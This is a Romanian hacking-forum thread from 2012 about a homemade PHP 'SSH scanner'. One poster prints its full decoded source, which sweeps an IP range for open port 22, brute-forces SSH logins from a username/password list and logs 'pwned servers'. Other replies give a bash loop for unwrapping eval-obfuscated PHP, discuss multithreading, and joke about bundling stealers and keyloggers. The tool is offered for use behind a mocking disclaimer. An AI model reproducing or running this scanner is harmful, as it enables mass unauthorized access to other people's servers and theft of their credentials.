adonisslanic Posted June 25, 2012 Report Posted June 25, 2012 (edited) Sql_err404 Edited December 18, 2012 by adonisslanic 9 1 Quote
denjacker Posted June 25, 2012 Report Posted June 25, 2012 Felicitari baieti si la mai multe ! instig la + rep ptr. amandoi Quote
Irk Posted June 25, 2012 Report Posted June 25, 2012 (edited) <?php error_reporting(0);parse_str(implode('&', array_slice($argv, 1)), $_GET);$path = dirname(__FILE__);set_include_path("{$path}/libs/phpseclib");require_once("Net/SSH2.php");if (isset($_GET['-help'])) { credits(); help(); die();}if (isset($_GET['-disclaimer'])) { disclaimer(); die();}if (isset($_GET['a']) && !empty($_GET['a'])) { switch ($_GET['a']) { case("scan"): scan(); break; case("brute"): brute(); break; default: die("\n\nThere's no action with this name.\n\n"); }} else scan();function scan(){ if (isset($_GET['c']) && !empty($_GET['c'])) { $expl = explode(".", $_GET['c']); if (count($expl) == 2 && $expl[0] >= 1 && $expl[0] <= 255 && $expl[1] >= 1 && $expl[1] <= 255) { $start_time = start_time(); unset($expl); $good_ips = array(); $k = 0; $q = 0; for ($i = 0; $i <= 255; $i++) { for ($j = 0; $j <= 255; $j++) { $ip = "{$_GET['c']}.{$i}.{$j}"; if (fsockopen($ip, 22, $errno, $errstr, 0.2)) { write_good_ip($ip); $k++; } $q++; clear_wannabe(); credits(); echo "Current ip: {$ip} / {$_GET['c']}.255.255\n"; echo "Found: {$k}\n"; echo "Elapsed time: " . number_format(elapsed_time($start_time), 1) . " sec.\n"; echo "Done: " . number_format(percentage($q, 65536), 3) . "%\n"; } } die("\n\nI've found {$k} ip(s)\n\n"); } else { credits(); die("The class must be like \"192.168\", not like \"{$_GET['c']}\"\n\n"); } } else { credits(); die("You must specify an ip class like \"scanner.php c=192.168\"\n\n"); }}function brute(){ $path = dirname(__FILE__); $ips = "{$path}/good_ips.txt"; $data = "{$path}/data.txt"; $ips = file_get_contents($ips); $data = file_get_contents($data); if (!empty($ips) && $ips != null && $ips != "\n") { if (!empty($data) && $data != null && $data != "\n") { $start_time = start_time(); $ips = explode("\n", $ips); unset($ips[count($ips) - 1]); $ips_count = count($ips); $data = explode("\n", $data); unset($data[count($data) - 1]); $data_count = count($data); $k = 0; $d = 0; $f = 0; foreach ($ips as $key => $ip) { $k++; foreach ($data as $key => $value) { $value = explode(" ", $value); $d++; $user = trim($value[0]); $pass = trim($value[1]); $ssh = new Net_SSH2($ip); if ($ssh->login($user, $pass)) { write_found($ip, $user, $pass); $f++; break; } clear_wannabe(); credits(); echo "Current ip: {$ip} ({$k}/{$ips_count})\n"; echo "Current data: {$user}:{$pass} ({$d}/{$data_count})\n"; echo "Found: {$f}\n"; echo "Elapsed time: " . number_format(elapsed_time($start_time), 1) . " sec.\n"; unset($ssh); } } die("\n\nI've found {$k} server(s)\n\n"); } else { credits(); die("It seems like there is no data in data.txt\n\n"); } } else { credits(); die("\n\nIt seems like there are no ips in good_ips.txt\n\n"); }}function write_found($ip, $user, $pass){ $path = dirname(__FILE__); $path = "{$path}/found.txt"; $f = file_get_contents($path); if (!strpos($f, $ip)) { $file = fopen($path, "a"); fwrite($file, "{$ip} {$user}:{$pass}\n"); fclose($file); }}function write_good_ip($ip){ $path = dirname(__FILE__); $path = "{$path}/good_ips.txt"; $f = file_get_contents($path); if (!strpos($f, $ip)) { $file = fopen($path, "a"); fwrite($file, "{$ip}\n"); fclose($file); }}function clear_wannabe(){ for ($i = 0; $i <= 150; $i++) { echo "\n"; }}function percentage($what, $butt){ $return = ""; if ($what <= $butt) { $return = ($what / $butt) * 100; } else $return = "I said what what in the butt, in this case, the what is bigger than the butt :("; return $return;}function start_time(){ $mtime = microtime(); $mtime = explode(" ", $mtime); $mtime = $mtime[1] + $mtime[0]; return $mtime;}function elapsed_time($start_time){ $mtime = microtime(); $mtime = explode(" ", $mtime); $mtime = $mtime[1] + $mtime[0]; return ($mtime - $start_time);}function help(){ echo "+-------------------------------------------------------------+ \n"; echo "| | \n"; echo "| Help section :3 | \n"; echo "| | \n"; echo "| proudly brought to you by 2 noobs | \n"; echo "| | \n"; echo "| Example of a scan: | \n"; echo "| php scanner.php a=scan c=192.168 | \n"; echo "| | \n"; echo "| Example of a bruteforce against scanned results: | \n"; echo "| php scanner.php a=brute | \n"; echo "| | \n"; echo "| Generated files(so you won't have to be paranoid): | \n"; echo "| 1. good_ips.txt | \n"; echo "| 2. found.txt | \n"; echo "| File \"1\" contains the good ips list | \n"; echo "| File \"2\" contains pwned servers list | \n"; echo "| | \n"; echo "| May the r00t be with you! | \n"; echo "| (and don't forget to keep your pimp hand strong) | \n"; echo "| | \n"; echo "+-------------------------------------------------------------+ \n\n";}function credits(){ echo "\n\n"; echo "\t\t+-----------------------------+\n"; echo "\t\t| phP.I.M.P. Scanner |\n"; echo "\t\t| [v1.0] |\n"; echo "\t\t| |\n"; echo "\t\t| by bogdannbv & adonisslanic |\n"; echo "\t\t+-----------------------------+\n\n";}function disclaimer(){ echo "\n"; echo " ~~Disclaimer~~ \n"; echo "\n"; echo " WE DO NOT SUPPORT HACKING! \n"; echo "\n"; echo " THIS IS A SECURITY TESTING TOOL! \n"; echo "\n"; echo " THIS TOOL IS MENT TO BE USED ONLY ON YOUR OWN HOME NETWORK! \n"; echo "\n"; echo " DO NOT USE IT OUTSIDE YOUR NETWORK. \n"; echo "\n"; echo " IF YOU GET IN TROUBLE BY USING THIS TOOL IT IS JUST YOUR FAULT. \n"; echo "\n"; echo "WE ARE NOT RESPONSIBLE FOR ANY KIND OF DAMAGE THAT THIS TOOL MAY CAUSE. \n"; echo " *Possbile Damages : -cat bursting into flames; \n"; echo " -xmass tree's lights fail; \n"; echo " -getting robbed by an evil clown; \n"; echo " -no more puding left in the fridge ; \n"; echo "\n"; echo " USE THIS SOFTWARE ON YOUR OWN RISK, YOU'RE ON YOUR OWN!! \n"; echo "\n"; echo " WE ARE RESPONSIBLE FOR NOTHING! \n"; echo "\n";} Edited June 25, 2012 by MrRip Quote
shark0der Posted June 25, 2012 Report Posted June 25, 2012 let i=0;while [ true ]do let i=i+1; let j=i+1; let c=$(cat ${i}.php | grep eval | wc -l) if [ $c -eq 1 ]; then cp ${i}.php ${i}.original.php sed -i 's/eval(/echo (/' ${i}.php php ${i}.php > ${j}.php echo created $j.php echo press any key to continue read else echo done :\) break fidone Quote
BogdanNBV Posted June 25, 2012 Report Posted June 25, 2012 (edited) Shhhh haideti sa va zic un secret, dar sa nu mai spuneti la nimeni, se pare ca deasupra mea sunt niste hiecari profesionisti!@Irk: in lista mea de Eroi PRO 1336.9 H!3c4r! esti pe locul 2, deoarece pe locul 1 poate fi doar "shark0der". Edited June 25, 2012 by BogdanNBV 2 Quote
Irk Posted June 26, 2012 Report Posted June 26, 2012 (edited) big up shark0der.bogdannbv dar de cine ati ascuns voi sursa aia, copii? Edited June 26, 2012 by Irk Quote
Vlachs Posted June 26, 2012 Report Posted June 26, 2012 big up shark0der.bogdannbv dar de cine ati ascuns voi sursa aia, copii?De ce va bagati aiurea in seama, mai ales tu, care este motivul, vrei sa faci pe interesantul ? Quote
Irk Posted June 26, 2012 Report Posted June 26, 2012 cum adica intelegi criptarea? ce-i aici, microsoft, apple? n-ar trebui sa ne ajutam si sa nu ascundem surse, mai ales pentru niste cod de 2 bani? atat zic. Quote
Vlachs Posted June 26, 2012 Report Posted June 26, 2012 cum adica intelegi criptarea? ce-i aici, microsoft, apple? n-ar trebui sa ne ajutam si sa nu ascundem surse, mai ales pentru niste cod de 2 bani? atat zic.Si tu cu ce ajuti, cu ce ai ajutat pana acum, ai 7 posturi din care 3 le-ai facut aici, ce gandire tampita Quote
adonisslanic Posted June 26, 2012 Author Report Posted June 26, 2012 Cei care sunt emo ca am ascuns sursa "degeaba", era ascunsa just for trolling purposes, la fel ca si modul in care a fost creat scannerul:bogdannbv: ba, da-mi idee de site adonisslanic: ssh scanner xDbogdannbv: site? adonisslanic: nu, CLI PHP script xDChiar nu ii inteleg pe cei din posturile anterioare care s-au suparat ca am "criptat" sursa ) e usor de decriptat, cine vrea sa faca asta, e binevenit =(^-^)= (oricum a pus-o Irk ) Quote
BogdanNBV Posted June 26, 2012 Report Posted June 26, 2012 Oricum, daca Irk ala reuseste sa faca crack la Mozilla Firefox sau la Open Office, va ajunge pe locul 1 in lista mea... Frate, cum a zis si redcoder, l-am ascuns pentru leecheri ca sa nu schimbe numele noastre din el, dar ma rog, urmatoarele versiuni, daca vor mai exista altele, fiecare copie a scriptului va avea parola proprie si scriptul + parola nu va mai fi asa public, avem niste idei interesante, nu ca asta, asta a fost facut in graba, repede, fara a fi gandit prea mult la el. Quote
DuTy^ Posted June 26, 2012 Report Posted June 26, 2012 Blow jo.. pardon Good job. Next time, daca aveti nevoie ma bag si eu... mai o idee mai un cod Quote
BogdanNBV Posted June 26, 2012 Report Posted June 26, 2012 Da, merge greu, de aceea in versiunea urmatoare urmeaza niste modificari majore, el a fost facut, cum am mai spus, in graba, fara a ne gandi prea mult la el, vom experimenta si vom incerca sa-l facem si mai rapid, si mai securizat @DuTy^: trimite-mi un MP cu o adresa de email sau id de yahoo messenger, sa vorbim, poate ai tu niste idei buna, apropo, nu ala este id-ul meu care l-ai intrebat pe adonis xD Quote
Irk Posted June 26, 2012 Report Posted June 26, 2012 (edited) Php nu e multithreaded, de-aia se scriu scannerele in python sau ruby. O varianta pentru coderii de php care vor threaduri e extensia pcntl: PHP pcntl: Basic usage example. Cat despre protectia codului: daca nu acceptati ca aveti doar de invatat din open source, bafta. Eu unul caut intai cunostinte, abia apoi bani. Daca vreti sa discutam cod php pe viitor ne auzim pe github, pentru ca n-o sa-mi para mereu interesant sa va sparg criptarile copilaresti. Edited June 26, 2012 by Irk 1 Quote
ForTestingPurposes Posted June 26, 2012 Report Posted June 26, 2012 (edited) ce este acest scanner si ce face el mai exact?SUNT NOOB, nu-ti convine? mata-i grasa Edited June 26, 2012 by ForTestingPurposes Quote
ForTestingPurposes Posted June 27, 2012 Report Posted June 27, 2012 Let me google that for youCand predic te vindec cu-n debit puternic de cuvinte de spirit sau te-aduc intr-un punct termic, critic si te termin vremelnic ca pot fii nemernic si cinic. Quote
Vlachs Posted June 27, 2012 Report Posted June 27, 2012 Cand predic te vindec cu-n debit puternic de cuvinte de spirit sau te-aduc intr-un punct termic, critic si te termin vremelnic ca pot fii nemernic si cinic.Urmatorul post iti aduce ban. Quote
Irk Posted June 28, 2012 Report Posted June 28, 2012 si mai e o faza cu criptarea codului (motiv pentru care l-am si decriptat, dealtfel): cum sa ai incredere ca nu-i ceva payload acolo? Quote
BogdanNBV Posted June 28, 2012 Report Posted June 28, 2012 (edited) @demisec: Da, scanner-ul va putea folosi mai multe procese simultan, deja este in stare sa scaneze, cat despre ce ai zis tu cu thread-urile, pai, sincer sa fiu, deocamdata, daca ii dau sa scaneze 255 ip-uri, impartite la 6 procese, le scaneaza instant, dureaza mai mult afisarea mesajelor de debugging puse pentru a vedea cand porneste un proces si cand se opreste, si nu vom face cum spui tu, daca un proces isi termina lucrul, sa mai ia si de la altul, deoarece procesele se incheie toate aproape simultan, reusind acest lucru in urma a 4 ore de gandiri intense si cod scris si sters intruna.I-am adaugat un alt fel de comenzi, mai logice, acum poti da o anumita arie pe care sa o scaneze, de exemplu: "192.168.232.0-192.168.234.255", deci iti poti selecta cat, ce si cum sa scaneze, in plus am mai adaugat o valoare a puterii de scanare / bruteforce, care va avea valori de la 1-5, mai multe detalii vor urma sa apara @Irk: In versiunea asta vom include in fisierul de 20 kb urmatoarele: 3 stealer-e, 8 keylogger-e, 200 exploit-uri linux, pentru fiecare distributie existenta ( 24 numai pentru RedHat gasite de mine personal), si 30 pentru Mac OS Edited June 28, 2012 by BogdanNBV Quote
kNigHt Posted June 28, 2012 Report Posted June 28, 2012 s-au vazut si payloaduri mai destepte.Daca esti asa de sceptic de ce nu-i dai decode la fisier? La cum pui problema nu cred ca ti-e greu sa-ti faci un script care sa dea base64 decode de 15-20 de ori sau de cate ori era encodat scriptul.ON: Chiar daca PHP nu are suport nativ pentru multithread, puteti da un system('script.php') cu anumite argumente, astfel scriptul se apeleaza pe el insusi, procesul ramanand activ, cu niste artificii de programare ar merge bine ideea. Quote
Irk Posted June 28, 2012 Report Posted June 28, 2012 Daca esti asa de sceptic de ce nu-i dai decode la fisier? La cum pui problema nu cred ca ti-e greu sa-ti faci un script care sa dea base64 decode de 15-20 de ori sau de cate ori era encodat scriptul.ON: Chiar daca PHP nu are suport nativ pentru multithread, puteti da un system('script.php') cu anumite argumente, astfel scriptul se apeleaza pe el insusi, procesul ramanand activ, cu niste artificii de programare ar merge bine ideea.1) am publicat deja sursa tot in threadul asta2) am mentionat deja o metoda mai buna pentru multithreading in php. Quote
adonisslanic Posted June 28, 2012 Author Report Posted June 28, 2012 Irk, fii useful si posteaza un scanner in php aici, noi intre timp facem ceva serios in Python Multumesc anticipat, sunt sigur ca va fi epic scannerul tau Quote
Irk Posted June 28, 2012 Report Posted June 28, 2012 Nu am facut pan-acum decat critica constructiva si autorii n-au facut decat sa fasaie ca sifonul in loc sa ia notite si sa zica multumesc nenea.Daca chiar vroiai sa ajuti comunitatea de coderi php, din nou, il faceai in php5.3.5+ oop, il puneai pe github, lasai lumea sa faca fork si sa dezvolte mai departe.Codul ala-i mai mult de C decat de php, e plin de texte de cacat si nici nu prea isi face treaba.Acum e randul vostru. Invatati din ce zic sau va agitati mai departe, dar lumea merge inainte si merge pe calea despre care vorbesc eu aici. Quote
